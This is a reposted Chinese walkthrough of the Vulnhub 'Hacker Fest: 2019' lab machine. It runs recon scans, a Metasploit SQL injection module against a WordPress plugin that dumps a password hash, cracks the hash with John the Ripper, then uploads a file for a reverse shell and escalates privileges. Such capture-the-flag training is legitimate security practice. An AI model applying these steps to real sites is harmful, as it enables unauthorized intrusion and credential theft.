搜索

分享

QQ空间 QQ好友新浪微博微信

Hacker Fest: 2019 Vulnhub Walkthrough

Coder编程 2021-12-02

展开全文

靶机地址：

https://www./entry/hacker-fest-2019,378/

主机扫描：

FTP尝试匿名登录

应该是WordPress的站点

进行目录扫描：

python3 dirsearch.py http://10.10.203.17/ -e html,json,php

此外还有一个phpmyadmin

http://10.10.203.17/phpmyadmin/index.php

使用wpscan扫描检测插件漏洞

wpscan --url http://10.10.203.17

msf5 > use auxiliary/admin/http/wp_google_maps_sqli

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.10.203.17
rhosts => 10.10.203.17

msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
[*] Running module against 10.10.203.17

[*] 10.10.203.17:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191014174707_default_10.10.203.17_wp_google_maps.j_470411.bin
[+] 10.10.203.17:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) >

密码hash破解

john --wordlist=/usr/share/wordlists/rockyou.txt hash

kittykat1

http://10.10.203.17/wp-admin/

安装ubh插件，进行上传文件

本地监听，访问反弹shell

这里有两个思路：

1是通过webshell切换到webmaster用户

2是直接通过远程ssh登录系统

进行提权

OVER!

本站是提供个人知识管理的网络存储空间，所有内容均由用户发布，不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息，谨防诈骗。如发现有害或侵权内容，请点击一键举报。

转藏分享

QQ空间 QQ好友新浪微博微信

献花（0） +1

来自： Coder编程 > 《待分类》

举报/认领

0条评论

请遵守用户评论公约

类似文章 更多

Coder编程

关注对话

TA的最新馆藏

shell脚本基础-2
linux查看文件大小
Controller报错: java.lang.NoSuchMethodException: java.util.List.<init>()
Vue3: does not provide an export named 'createRouter'
JavaSE常用类之Instant类及常用方法
定位特点

喜欢该文的人也喜欢更多

热门阅读换一换